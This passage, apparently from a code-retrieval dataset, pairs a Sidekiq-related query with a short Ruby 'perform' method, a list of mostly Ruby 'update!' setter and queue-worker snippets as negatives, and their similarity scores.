args.key?(:udr_proto_detailed_entity_scores)\n @udr_proto_overlay = args[:udr_proto_overlay] if args.key?(:udr_proto_overlay)\n @udr_proto_webref_mention = args[:udr_proto_webref_mention] if args.key?(:udr_proto_webref_mention)\n @universal_facts = args[:universal_facts] if args.key?(:universal_facts)\n @unwanted_image_data_list = args[:unwanted_image_data_list] if args.key?(:unwanted_image_data_list)\n @uri_annotations = args[:uri_annotations] if args.key?(:uri_annotations)\n @util_status_proto = args[:util_status_proto] if args.key?(:util_status_proto)\n @verticals_discussion_discussion_annotation_tag = args[:verticals_discussion_discussion_annotation_tag] if args.key?(:verticals_discussion_discussion_annotation_tag)\n @video_crawl_automated_audio_extraction_signals = args[:video_crawl_automated_audio_extraction_signals] if args.key?(:video_crawl_automated_audio_extraction_signals)\n @video_crawl_automated_extraction_signals = args[:video_crawl_automated_extraction_signals] if args.key?(:video_crawl_automated_extraction_signals)\n @video_crawl_domain_video_click_data = args[:video_crawl_domain_video_click_data] if args.key?(:video_crawl_domain_video_click_data)\n @video_crawl_video_click_data = args[:video_crawl_video_click_data] if args.key?(:video_crawl_video_click_data)\n @video_crawl_video_salient_term_set = args[:video_crawl_video_salient_term_set] if args.key?(:video_crawl_video_salient_term_set)\n @video_crawl_video_scoring_signals = args[:video_crawl_video_scoring_signals] if args.key?(:video_crawl_video_scoring_signals)\n @video_crawl_watch_page_pattern_classification = args[:video_crawl_watch_page_pattern_classification] if args.key?(:video_crawl_watch_page_pattern_classification)\n @video_crawl_youtube_embed_signal = args[:video_crawl_youtube_embed_signal] if args.key?(:video_crawl_youtube_embed_signal)\n @video_scoring_signal = args[:video_scoring_signal] if args.key?(:video_scoring_signal)\n @video_web_gallery = args[:video_web_gallery] if args.key?(:video_web_gallery)\n @video_youtube_live_cardio_cardio_stats = args[:video_youtube_live_cardio_cardio_stats] if args.key?(:video_youtube_live_cardio_cardio_stats)\n @volt = args[:volt] if args.key?(:volt)\n @watchpage_language_watch_page_language_result = args[:watchpage_language_watch_page_language_result] if args.key?(:watchpage_language_watch_page_language_result)\n @websitetools_feeds_annotations_feed_content_annotations = args[:websitetools_feeds_annotations_feed_content_annotations] if args.key?(:websitetools_feeds_annotations_feed_content_annotations)\n @websitetools_feeds_linked_feed_linked_feed = args[:websitetools_feeds_linked_feed_linked_feed] if args.key?(:websitetools_feeds_linked_feed_linked_feed)\n @websitetools_feeds_podcast_podcast_signals = args[:websitetools_feeds_podcast_podcast_signals] if args.key?(:websitetools_feeds_podcast_podcast_signals)\n @websitetools_feeds_spore_feeds_spore_triples = args[:websitetools_feeds_spore_feeds_spore_triples] if args.key?(:websitetools_feeds_spore_feeds_spore_triples)\n @whatshapp_stride_extractions = args[:whatshapp_stride_extractions] if args.key?(:whatshapp_stride_extractions)\n @youtube_alexandria_youtube_body = args[:youtube_alexandria_youtube_body] if args.key?(:youtube_alexandria_youtube_body)\n @youtube_alexandria_youtube_signal = args[:youtube_alexandria_youtube_signal] if args.key?(:youtube_alexandria_youtube_signal)\n end",
"def update!(**args)\n @box = args[:box] if args.key?(:box)\n @letters_count = args[:letters_count] if args.key?(:letters_count)\n end",
"def update(text); end",
"def update!(**args)\n @replace_message_fields = args[:replace_message_fields] if args.key?(:replace_message_fields)\n @replace_repeated_fields = args[:replace_repeated_fields] if args.key?(:replace_repeated_fields)\n end",
"def update!(**args)\n @compound_code = args[:compound_code] if args.key?(:compound_code)\n @global_code = args[:global_code] if args.key?(:global_code)\n end",
"def update!(**args)\n @compressed_salience = args[:compressed_salience] if args.key?(:compressed_salience)\n @country_code = args[:country_code] if args.key?(:country_code)\n @salience = args[:salience] if args.key?(:salience)\n end",
"def update!(**args)\n @annotations = args[:annotations] if args.key?(:annotations)\n @line_item_id = args[:line_item_id] if args.key?(:line_item_id)\n @product_id = args[:product_id] if args.key?(:product_id)\n end",
"def update!(**args)\n @gcid_intent = args[:gcid_intent] if args.key?(:gcid_intent)\n @salient_term_set = args[:salient_term_set] if args.key?(:salient_term_set)\n end",
"def update(...)\n end",
"def update_cr_affis(affi_lines)\n db = get_db()\n affi_lines.each do |cr_affi|\n cr_affi_id = cr_affi[0]\n cr_affi_name = cr_affi[1]\n sql_cmd = \"\"\n # puts \"\\n££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n # print \"\\naffiliation STRING: \" + cr_affi_name\n # puts \"\\n££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n if cr_affi_name.include?(\"\\n\") then\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n sql_cmd = \"UPDATE cr_affiliations SET name =\\\"\" + cr_affi_name.gsub(\"\\n\", \" \") + \"\\\" WHERE id = \" + cr_affi_id.to_s + \";\"\n puts sql_cmd\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n end\n if cr_affi_name.include?(\"\\r\") then\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n sql_cmd = \"UPDATE cr_affiliations SET name =\\\"\" + cr_affi_name.gsub(\"\\r\", \" \") + \"\\\" WHERE id = \" + cr_affi_id.to_s + \";\"\n puts sql_cmd\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n end\n if sql_cmd != \"\" then db.execute(sql_cmd) end\n end\nend",
"def update\n megam_rest.update_quotas(to_hash)\n end",
"def update!(**args)\n @barcode = args[:barcode] if args.key?(:barcode)\n @layout = args[:layout] if args.key?(:layout)\n end",
"def update!(**args)\n @intent_id = args[:intent_id] if args.key?(:intent_id)\n @slot_name = args[:slot_name] if args.key?(:slot_name)\n end",
"def update!(**args)\n @material = args[:material] if args.key?(:material)\n @text = args[:text] if args.key?(:text)\n end",
"def update!(**args)\n @idf = args[:idf] if args.key?(:idf)\n @plural_prob = args[:plural_prob] if args.key?(:plural_prob)\n end",
"def update!(**args)\n @ad_code = args[:ad_code] if args.key?(:ad_code)\n @amp_body = args[:amp_body] if args.key?(:amp_body)\n @amp_head = args[:amp_head] if args.key?(:amp_head)\n end",
"def update!(**args)\n @amarna_docid = args[:amarna_docid] if args.key?(:amarna_docid)\n @asr_repair = args[:asr_repair] if args.key?(:asr_repair)\n @lang = args[:lang] if args.key?(:lang)\n @punctuated_transcript = args[:punctuated_transcript] if args.key?(:punctuated_transcript)\n @saft_document = args[:saft_document] if args.key?(:saft_document)\n @saft_sentence_boundary = args[:saft_sentence_boundary] if args.key?(:saft_sentence_boundary)\n @timing_info = args[:timing_info] if args.key?(:timing_info)\n @webref_entities = args[:webref_entities] if args.key?(:webref_entities)\n end",
"def update!(**args)\n @dependency_edge = args[:dependency_edge] if args.key?(:dependency_edge)\n @lemma = args[:lemma] if args.key?(:lemma)\n @part_of_speech = args[:part_of_speech] if args.key?(:part_of_speech)\n @text = args[:text] if args.key?(:text)\n end",
"def update!(**args)\n @asr_mention_text = args[:asr_mention_text] if args.key?(:asr_mention_text)\n @asr_mention_transcript_offset = args[:asr_mention_transcript_offset] if args.key?(:asr_mention_transcript_offset)\n @asr_sentence = args[:asr_sentence] if args.key?(:asr_sentence)\n @asr_start_time = args[:asr_start_time] if args.key?(:asr_start_time)\n @bert_scores = args[:bert_scores] if args.key?(:bert_scores)\n @broadness = args[:broadness] if args.key?(:broadness)\n @duration_coverage = args[:duration_coverage] if args.key?(:duration_coverage)\n @entity_connectedness = args[:entity_connectedness] if args.key?(:entity_connectedness)\n @entity_description = args[:entity_description] if args.key?(:entity_description)\n @entity_info = args[:entity_info] if args.key?(:entity_info)\n @entity_mention_in_description = args[:entity_mention_in_description] if args.key?(:entity_mention_in_description)\n @estimated_mention_time = args[:estimated_mention_time] if args.key?(:estimated_mention_time)\n @group_cohesion = args[:group_cohesion] if args.key?(:group_cohesion)\n @hypernym_confidence = args[:hypernym_confidence] if args.key?(:hypernym_confidence)\n @hypernym_count = args[:hypernym_count] if args.key?(:hypernym_count)\n @hyperpedia_salient_terms_similarity = args[:hyperpedia_salient_terms_similarity] if args.key?(:hyperpedia_salient_terms_similarity)\n @in_webref_entities = args[:in_webref_entities] if args.key?(:in_webref_entities)\n @is_oracle_entity = args[:is_oracle_entity] if args.key?(:is_oracle_entity)\n @is_product = args[:is_product] if args.key?(:is_product)\n @max_mention_confidence = args[:max_mention_confidence] if args.key?(:max_mention_confidence)\n @mention_confidence = args[:mention_confidence] if args.key?(:mention_confidence)\n @mentions = args[:mentions] if args.key?(:mentions)\n @ms_from_last_anchor = args[:ms_from_last_anchor] if args.key?(:ms_from_last_anchor)\n @next_asr_sentence = args[:next_asr_sentence] if args.key?(:next_asr_sentence)\n @other_asr_mention_text = args[:other_asr_mention_text] if args.key?(:other_asr_mention_text)\n @other_estimated_mention_times = args[:other_estimated_mention_times] if args.key?(:other_estimated_mention_times)\n @previous_asr_sentence = args[:previous_asr_sentence] if args.key?(:previous_asr_sentence)\n @trusted_name_confidence = args[:trusted_name_confidence] if args.key?(:trusted_name_confidence)\n @webref_entity_topicality = args[:webref_entity_topicality] if args.key?(:webref_entity_topicality)\n end",
"def update!(**args)\n @csai = args[:csai] if args.key?(:csai)\n @fringe = args[:fringe] if args.key?(:fringe)\n @medical = args[:medical] if args.key?(:medical)\n @minor = args[:minor] if args.key?(:minor)\n @offensive = args[:offensive] if args.key?(:offensive)\n @porn = args[:porn] if args.key?(:porn)\n @spoof = args[:spoof] if args.key?(:spoof)\n @violence = args[:violence] if args.key?(:violence)\n @vulgar = args[:vulgar] if args.key?(:vulgar)\n end",
"def update!(**args)\n @line_concept = args[:line_concept] if args.key?(:line_concept)\n @stops = args[:stops] if args.key?(:stops)\n end",
"def message_update_processing\n Graphics.update\n $scene&.update\n end",
"def update_ape\n entries = fields.values.collect{|value| value.raw}.sort{|a,b| x = a.length <=> b.length; x != 0 ? x : a <=> b}\n @tag_data = entries.join\n @tag_item_count = entries.length\n @tag_size = tag_data.length + 64\n base_start = \"#{PREAMBLE}#{[tag_size-32, tag_item_count].pack('VV')}\"\n base_end = \"\\0\"*8\n @tag_header = \"#{base_start}\\x00#{HEADER_FLAGS}#{base_end}\"\n @tag_footer = \"#{base_start}\\x00#{FOOTER_FLAGS}#{base_end}\"\n raise ApeTagError, \"Updated tag has too many items (#{tag_item_count})\" if tag_item_count > MAX_ITEM_COUNT\n raise ApeTagError, \"Updated tag too large (#{tag_size})\" if tag_size > MAX_SIZE\n end",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @new_music = args[:new_music] if args.key?(:new_music)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n @type = args[:type] if args.key?(:type)\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_final = args[:is_final] if args.key?(:is_final)\n @message_type = args[:message_type] if args.key?(:message_type)\n @transcript = args[:transcript] if args.key?(:transcript)\n end",
"def update!(**args)\n @provenance = args[:provenance] if args.key?(:provenance)\n end",
"def update\n\t\t\n\t\tend",
"def update_item\n pcp_item.update_new_assmt( self )\n end",
"def update \n end",
"def update!(**args)\n @additional_phones = args[:additional_phones] if args.key?(:additional_phones)\n @primary_phone = args[:primary_phone] if args.key?(:primary_phone)\n end",
"def update(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_alpha, updated_beta, _) = _updated_annotator(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_mu_winner, updated_mu_loser) = _updated_mus(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_sigma_sq_winner, updated_sigma_sq_loser) = _updated_sigma_sqs(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t \n\t [updated_alpha, updated_beta, updated_mu_winner, updated_sigma_sq_winner, updated_mu_loser, updated_sigma_sq_loser]\n\tend",
"def update!(**args)\n @alias = args[:alias] if args.key?(:alias)\n @canonical = args[:canonical] if args.key?(:canonical)\n @canonical_lexical_mid = args[:canonical_lexical_mid] if args.key?(:canonical_lexical_mid)\n end",
"def update!(**args)\n @gainmap = args[:gainmap] if args.key?(:gainmap)\n end",
"def update\n megam_rest.update_assembly(to_hash)\n end",
"def update; end",
"def update!(**args)\n @additional_fixed_point_encodings = args[:additional_fixed_point_encodings] if args.key?(:additional_fixed_point_encodings)\n @compressed_document_embedding = args[:compressed_document_embedding] if args.key?(:compressed_document_embedding)\n @fixed_point_encoding = args[:fixed_point_encoding] if args.key?(:fixed_point_encoding)\n @scaled_fixed_point4_encoding = args[:scaled_fixed_point4_encoding] if args.key?(:scaled_fixed_point4_encoding)\n @scaled_fixed_point8_encoding = args[:scaled_fixed_point8_encoding] if args.key?(:scaled_fixed_point8_encoding)\n @scaled_shifted_fixed_point4_encoding = args[:scaled_shifted_fixed_point4_encoding] if args.key?(:scaled_shifted_fixed_point4_encoding)\n @version_and_improv_info = args[:version_and_improv_info] if args.key?(:version_and_improv_info)\n end",
"def update_position(account_name, pos_id, order_qty, escrow)\n action \"set escrow for position(#{pos_id}) to #{escrow}\"\n p = get(pos_id)\n p.escrow += escrow\n p.order_qty += order_qty\n end",
"def update!(**args)\n @intent_batch_inline = args[:intent_batch_inline] if args.key?(:intent_batch_inline)\n @intent_batch_uri = args[:intent_batch_uri] if args.key?(:intent_batch_uri)\n @intent_view = args[:intent_view] if args.key?(:intent_view)\n @language_code = args[:language_code] if args.key?(:language_code)\n @update_mask = args[:update_mask] if args.key?(:update_mask)\n end",
"def update!(**args)\n @ae_origin = args[:ae_origin] if args.key?(:ae_origin)\n end",
"def update!(**args)\n @sequence_segment = args[:sequence_segment] if args.key?(:sequence_segment)\n @not = args[:not] if args.key?(:not)\n @simple_segment = args[:simple_segment] if args.key?(:simple_segment)\n end",
"def update!(**args)\n @block_type = args[:block_type] if args.key?(:block_type)\n @box = args[:box] if args.key?(:box)\n @label = args[:label] if args.key?(:label)\n @orientation_label = args[:orientation_label] if args.key?(:orientation_label)\n @paragraph = args[:paragraph] if args.key?(:paragraph)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @text_confidence = args[:text_confidence] if args.key?(:text_confidence)\n end",
"def update!(**args)\n @modifier = args[:modifier] if args.key?(:modifier)\n @number = args[:number] if args.key?(:number)\n @number_span = args[:number_span] if args.key?(:number_span)\n @symbolic_quantity = args[:symbolic_quantity] if args.key?(:symbolic_quantity)\n @unit = args[:unit] if args.key?(:unit)\n end",
"def update!(**args)\n @pin = args[:pin] if args.key?(:pin)\n end"
] |
[
"0.6658007",
"0.60036933",
"0.5710292",
"0.5695588",
"0.56829643",
"0.56478083",
"0.55922955",
"0.55900496",
"0.55402684",
"0.55304533",
"0.5515028",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.54815155",
"0.5478228",
"0.5469598",
"0.5469598",
"0.54686874",
"0.5444804",
"0.54373574",
"0.5434437",
"0.5428063",
"0.54144484",
"0.5402177",
"0.5375368",
"0.5371796",
"0.5346058",
"0.5346058",
"0.53290623",
"0.53182507",
"0.5307537",
"0.5305579",
"0.5300975",
"0.52897",
"0.5284697",
"0.52764505",
"0.5276182",
"0.5268522",
"0.5265559",
"0.52640635",
"0.526344",
"0.52554804",
"0.5255457",
"0.52546436",
"0.52449596",
"0.52440345",
"0.5242355",
"0.52416396",
"0.5240359",
"0.52372605",
"0.5236719",
"0.5232987",
"0.52327245",
"0.52277833",
"0.5217897",
"0.52166164",
"0.5215681",
"0.5214936",
"0.521189",
"0.5209815",
"0.5204973",
"0.5202862",
"0.52010965",
"0.519446",
"0.519428",
"0.5194038",
"0.5180305",
"0.51780516",
"0.5176486",
"0.51732343",
"0.51730585",
"0.51716155",
"0.51701474",
"0.5167293",
"0.5163731",
"0.5163178",
"0.51609635",
"0.51600266",
"0.51594895",
"0.5159301",
"0.515686",
"0.51554275",
"0.51533675",
"0.5153028",
"0.5152051",
"0.51509714",
"0.5146901",
"0.5146257",
"0.5144484",
"0.51434344",
"0.5135884",
"0.5134116",
"0.5133093",
"0.51307017"
] |
0.559373
|
6
|
sidekiq_options queue: "high" change this shall add some config, else worker will not start. see document. sidekiq_options retry: false
|
def perform
publish_scheduled
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def configure worker,worker_config\n if worker_config[\"maximum_size\"]>0\n @queues[worker]=SizedQueue.new(worker_config[\"maximum_size\"])\n else\n @queues[worker]=Queue.new\n end\n configuration(worker)\n end",
"def sidekiq_options(opts = T.unsafe(nil)); end",
"def queue_opts\n {\n :max_bytes => 50_000,\n :service => config.kafka_response_topic,\n }\n end",
"def queue(options={})\n# puts 'in queue'\n set_auto_attributes\n upload_if_needed\n\n response = SimpleWorker.service.queue(self.class.name, sw_get_data, options)\n# puts 'queue response=' + response.inspect\n# @task_set_id = response[\"task_set_id\"]\n @task_id = response[\"task_id\"]\n response\n end",
"def sidekiq?\n option?(\"sidekiq\")\n end",
"def silence_single_worker_warning; end",
"def worker_config\n worker = JSON.parse(SideJob.redis.get(\"#{redis_key}:worker\"))\n SideJob::Worker.config(worker['queue'], worker['class']) || {}\n end",
"def configuration worker\n if @queues[worker] \n @queues[worker].respond_to?(:max) ? max_size=@queues[worker].max : max_size=0\n {'worker'=>worker,'maximum_size'=>max_size}\n else\n raise InvalidData,\"non existent queue\"\n end\n end",
"def worker_timeout\n option :worker_timeout, DEFAULT_WORKER_TIMEOUT\n end",
"def set_queue_options(options = {})\n @queue_options = options\n end",
"def sidekiq_task_options(opts = {})\n @sidekiq_task_options_hash = get_sidekiq_task_options.merge((opts).symbolize_keys!)\n end",
"def queue_job; end",
"def initialize\n @queue_options = {}\n @queue_configs = []\n end",
"def default_fail_queue_target\n true\n end",
"def stompkiq_options(opts={})\n self.stompkiq_options_hash = get_stompkiq_options.merge(symbolize_keys(opts || {}))\n end",
"def default_fail_queue_target\n false\n end",
"def job_options\n end",
"def config(queue, klass)\n config = SideJob.redis.hget \"workers:#{queue}\", klass\n config = JSON.parse(config) if config\n config\n end",
"def call(worker, msg, queue, redis = ::Sidekiq.method(:redis))\n working!(queue, redis)\n yield\n ensure\n working!(queue, redis)\n wait_for_task_or_scale(redis)\n end",
"def default_fail_queue_target\n true\n end",
"def sidekiq_queue(time=nil)\n # Don't need to queue if a worker is already in process of running\n return if SideJob.redis.exists \"#{redis_key}:lock:worker\"\n\n worker = JSON.parse(SideJob.redis.get(\"#{redis_key}:worker\"))\n # Don't need to queue if the job is already in the queue (this does not include scheduled jobs)\n # When Sidekiq pulls job out from scheduled set, we can still get the same job queued multiple times\n # but the server middleware handles it\n return if Sidekiq::Queue.new(worker['queue']).find_job(@id)\n\n if ! SideJob::Worker.config(worker['queue'], worker['class'])\n self.status = 'terminated'\n raise \"Worker no longer registered for #{klass} in queue #{worker['queue']}\"\n end\n item = {'jid' => id, 'queue' => worker['queue'], 'class' => worker['class'], 'args' => worker['args'] || [], 'retry' => false}\n item['at'] = time if time && time > Time.now.to_f\n Sidekiq::Client.push(item)\n end",
"def worker_initial_config\n\n end",
"def worker_queue\n PingWorker.perform_async(self.id)\n end",
"def requeue_perform_delay\n 1.0\n end",
"def requeue_perform_delay\n 1.0\n end",
"def worker_key; worker_options && worker_options[:worker_key]; end",
"def simulate_queue_worker(break_on_complete: false, quiet_polling: true)\n raise NotImplementedError, \"not implemented in production mode\" if Rails.env.production?\n\n deliver_on = MiqQueue.arel_table[:deliver_on]\n\n stale_entries = MiqQueue.where(:state => MiqQueue::STATE_DEQUEUE).count\n puts \"NOTE: there are #{stale_entries} entries on the queue that are in progress\" if stale_entries > 0\n\n future_entries = MiqQueue.where(deliver_on.gt(1.minute.from_now)).count\n puts \"NOTE: there are #{future_entries} entries in the future\" if future_entries > 0\n\n loop do\n q = with_console_sql_logging_level(quiet_polling ? 1 : ActiveRecord::Base.logger.level) do\n MiqQueue.where.not(:state => MiqQueue::STATE_DEQUEUE)\n .where(deliver_on.eq(nil).or(deliver_on.lteq(Time.now.utc)))\n .where.not(:queue_name => \"miq_server\")\n .order(:priority, :id)\n .first\n end\n if q\n begin\n q.update!(:state => MiqQueue::STATE_DEQUEUE, :handler => MiqServer.my_server)\n rescue ActiveRecord::StaleObjectError\n else\n puts \"\\e[33;1m\\n** Delivering #{MiqQueue.format_full_log_msg(q)}\\n\\e[0;m\"\n q.deliver_and_process\n end\n else\n break_on_complete ? break : sleep(1.second)\n end\n break if break_on_complete.kind_of?(Integer) && (break_on_complete -= 1) <= 0\n end\n end",
"def perform_later(*args, **options)\n __debug_job(__method__) { \"options = #{item_inspect(options)}\" } # TODO: remove\n job_warn { \"ignoring method args #{args.inspect}\" } if args.present?\n enqueue(options)\n end",
"def after_enqueue_scale_workers_up(*args)\n if HerokuScaler.heroku?\n scaler = HerokuScaler.new(@queue)\n scaler.workers = 1 if job_count > 0\n end\n end",
"def perform\n raise RuntimeError, \"Worker Implementations should override this\"\n end",
"def retry_options\n {tries: 15, sleep: 1}\n end",
"def setup\n Sidekiq::Worker.clear_all\n end",
"def initialize options = {}\n symbolize_keys! options\n\n @queue = Queue.new\n @write_key = options[:write_key]\n @max_queue_size = options[:max_queue_size] || Defaults::Queue::MAX_SIZE\n @options = options\n @worker_mutex = Mutex.new\n @worker = Worker.new @queue, @write_key, @options\n\n check_write_key!\n\n at_exit { @worker_thread && @worker_thread[:should_exit] = true }\n end",
"def apply_async!(queue: 'eventually')\n super\n end",
"def sidekiq_payload(options, message)\n {\n 'queue' => options[:queue],\n 'jid' => SecureRandom.hex(12),\n 'enqueued_at' => Time.now.to_f,\n 'class' => options[:worker],\n 'args' => [message],\n 'backtrace' => true,\n 'retry' => 3\n }.to_json\n end",
"def run\n super\n\n config = _get_task_config \"control/collection_processor\"\n\n @sqs = Aws::SQS::Client.new({\n region: 'us-east-1',\n access_key_id: config[\"aws_access_key\"],\n secret_access_key: config[\"aws_secret_access_key\"]\n })\n\n @control_queue_uri = config[\"control_queue_uri\"]\n @status_queue_uri = config[\"status_queue_uri\"]\n sleep_interval = config[\"sleep\"] || 10\n max_seconds = config[\"max_seconds\"] || 36000\n\n handler = config[\"handler\"]\n\n # connect to the configured amazon queue & Grab one\n _set_status :available, nil\n instruction_data = nil\n iteration = 0\n while true\n\n # loop until we have something\n while !instruction_data\n\n _log \"Attempting to get an instruction from the queue!\"\n instruction_data = _get_queued_instruction # try again\n\n # kick it off if we got one, and break out of this loop\n if instruction_data\n _log \"[+] Executing #{instruction_data[\"id\"]} for #{sleep_interval} seconds! (expire in: ~#{max_seconds - (iteration * sleep_interval) }s)\"\n _set_status :start, \"#{instruction_data[\"id\"]}\"\n _execute_instruction(instruction_data)\n else\n _log \"Nothing to do, waiting!\"\n sleep sleep_interval\n end\n\n end\n\n # hold tight\n sleep sleep_interval\n\n # determine how we're doing\n task_count_left = _tasks_left\n seconds_elapsed = iteration * sleep_interval\n done = (iteration > 10 && task_count_left == 0 ) || (seconds_elapsed > max_seconds)\n\n _log \"Seconds elapsed: #{seconds_elapsed}\" if iteration % 10 == 0\n _log \"Tasks left: #{task_count_left}\" if iteration % 10 == 0\n\n if done\n _log_good \"Done with #{instruction_data[\"id\"]} after #{seconds_elapsed}s\"\n _set_status :end, {\n \"id\" => \"#{instruction_data[\"id\"]}\",\n \"elapsed\" => \"#{seconds_elapsed}\",\n \"entities\" => \"#{Intrigue::Model::Project.first(:name => instruction_data[\"id\"]).entities.count}\"\n }\n\n _log_good \"#{instruction_data[\"id\"]}\"\n _run_handlers instruction_data\n _set_status :sent, \"#{instruction_data[\"id\"]}\"\n\n instruction_data = nil\n iteration = -1\n\n end\n\n iteration +=1\n end\n\n end",
"def initialize(adapter_factory, options={})\n @adapter_factory = adapter_factory\n options = @@default_options.merge(options)\n @stopped = false\n @name = options[:name] || Qwirk::DEFAULT_NAME\n @poll_time = options[:poll_time] || 3.0\n @stop_time = options[:stop_time]\n @worker_configs = []\n @env = options[:env]\n @worker_options = parse_worker_file(options[:worker_file])\n @persist_file = options[:persist_file]\n @persist_options = (@persist_file && File.exist?(@persist_file)) ? YAML.load_file(@persist_file) : {}\n\n BaseWorker.worker_classes.each do |worker_class|\n worker_class.each_config(adapter_factory.worker_config_class) do |config_name, extended_worker_config_class, default_options|\n # Least priority is config default_options defined in the Worker class, then the workers.yml file,\n # highest priority is persist_file (ad-hoc changes made manually)\n options = {}\n options = options.merge(@worker_options[config_name]) if @worker_options[config_name]\n options = options.merge(@persist_options[config_name]) if @persist_options[config_name]\n worker_config = extended_worker_config_class.new(adapter_factory, config_name, self, worker_class, default_options, options)\n bean_add_child(config_name, worker_config)\n @worker_configs << worker_config\n end\n end\n\n start_timer_thread\n at_exit { stop }\n end",
"def on_backends_sidekiq_base_worker_perform(event)\n count = event[:consumer].send(:params_batch).size\n topic = event[:consumer].topic.name\n time = event[:time]\n info \"Sidekiq processing of topic #{topic} with #{count} messages took #{time} ms\"\n end",
"def requeue\n Sidekiq.redis { |conn| conn.rpush(QueueName.expand(queue_name), job) }\n end",
"def worker_init\n raise \"Invalid worker name\" if !worker_name\n Thread.abort_on_exception = true\n\n # stores the job key of currently running job\n Thread.current[:job_key] = nil\n initialize_logger\n\n @thread_pool = ThreadPool.new(self,pool_size || 20,@logger)\n t_worker_key = worker_options && worker_options[:worker_key]\n\n @cache = ResultStorage.new(worker_name,t_worker_key,BDRB_CONFIG[:backgroundrb][:result_storage])\n\n if(worker_options && worker_options[:schedule] && no_auto_load)\n load_schedule_from_args\n elsif(BDRB_CONFIG[:schedules] && BDRB_CONFIG[:schedules][worker_name.to_sym])\n @my_schedule = BDRB_CONFIG[:schedules][worker_name.to_sym]\n new_load_schedule if @my_schedule\n end\n if respond_to?(:create)\n invoke_user_method(:create,worker_options[:data])\n end\n if run_persistent_jobs?\n add_periodic_timer(persistent_delay.to_i) {\n begin\n check_for_enqueued_tasks\n rescue Object => e\n puts(\"Error while running persistent task : #{Time.now}\")\n log_exception(e.backtrace)\n end\n }\n end\n write_pid_file(t_worker_key)\n end",
"def perform args={each_minute: RUN_EVERY}\n # call an other job\n CowsayJob.perform_later # topic: 'ru'\n \n self.class.perform_later wait: args[:each_minute].minute # re-queue\n end",
"def fail_fast\n return nil unless published?\n\n @fail_fast ||= Integer(@redis.hget(key_queue_config, \"fail_fast\"))\n end",
"def consumer_job_queue=(val)\n config.consumer_job_queue = val.to_sym\n # Refresh the consumer job queue\n Rimless::ConsumerJob.sidekiq_options(\n queue: Rimless.configuration.consumer_job_queue\n )\n end",
"def queue_worker_once_command(tries)\n if version < \"5.3.0\"\n \"php artisan queue:work --tries=#{tries}\"\n else\n \"php artisan queue:work --once --tries=#{tries}\"\n end\n end",
"def requeue_throttled\n Sidekiq.redis { |conn| conn.lpush(QueueName.expand(queue_name), job) }\n end",
"def be_worker\n before_work\n super\n end",
"def default_configuration!(config, options = {})\n options[:threads] ||= config.default_threads\n config.registry.each do |name, klass|\n klass.available_jobs.each do |method|\n add_worker Woodhouse::Layout::Worker.new(name, method, options)\n end\n end\n end",
"def worker_config\n if BDRB_CONFIG[:workers] && BDRB_CONFIG[:workers][worker_name.to_sym]\n BDRB_CONFIG[:workers][worker_name.to_sym]\n else\n {}\n end\n end",
"def before_perform_ensure_proper_worker(*args)\n if args.last.is_a?(::Resque::Worker)\n self.worker = args.last\n else\n raise \"Resque::Job#args has not been overriden to pass worker as last argument.\"\n end\n \n if required_worker_class && worker.class.name != required_worker_class\n raise ::Resque::Job::DontPerform\n end\n end",
"def retry\n self.class.enqueue(\n object,\n method_name,\n *(args << {\n :job_options => {\n :parent_id => parent_id || id,\n :run_at => Time.now + times_failed ** 4,\n :priority => priority\n }\n })\n )\n end",
"def worker_pool; end",
"def worker_pool; end",
"def queue_select_limit\n (\n options[:queue_select_limit] ||\n rails_config[:queue_select_limit] ||\n env['GOOD_JOB_QUEUE_SELECT_LIMIT']\n )&.to_i\n end",
"def queue(queue)\n @configuration.queue = queue\n end",
"def ignore_slow_queue_if_disabled\n propono_config.slow_queue_enabled = false\n\n main_queue = mock\n @listener.stubs(main_queue: main_queue)\n slow_queue = mock\n @listener.stubs(slow_queue: slow_queue)\n\n @listener.expects(:read_messages_from_queue).with(main_queue, propono_config.num_messages_per_poll).returns(false)\n @listener.expects(:read_messages_from_queue).with(slow_queue, 1).never\n @listener.send(:read_messages)\n end",
"def configure_command\n load_configuration_file\n return false unless determine_products_to_parse\n return false unless determine_product_version_to_parse\n\n determine_number_of_attempts\n setup_destination_directory\n Workers.pool.resize(10)\n true\n end",
"def perform(*args)\n if Service.get_service.jobs_enabled?\n # Job processing is enabled.\n Delayed::Worker.logger.info \"---> running #{self.class}(#{args.join(',')}) on #{self.queue_name} at priority #{Process::getpriority(Process::PRIO_PROCESS, 0)}\"\n start_time = Time.current\n perform_if_enabled(*args)\n Delayed::Worker.logger.info \"<--- finished #{self.class} after #{time_ago_in_words(start_time)}\"\n else\n # Resubmit the job with the required parameters after the specified delay. If the inline adapter is being used, we just ignore this.\n Delayed::Worker.logger.warn \"**** job processing disabled for #{self.class}\"\n begin\n self.class.set(wait: DISABLED_RETRY_INTERVAL).perform_later(*args)\n rescue NotImplementedError => _e\n Delayed::Worker.logger.error \"**** no job queue available for future job #{self.class}\"\n end\n end\n end",
"def job_priority\n case params[:queue]\n when 'high'\n 0\n when 'medium'\n 1\n when 'low'\n 2\n end\n end",
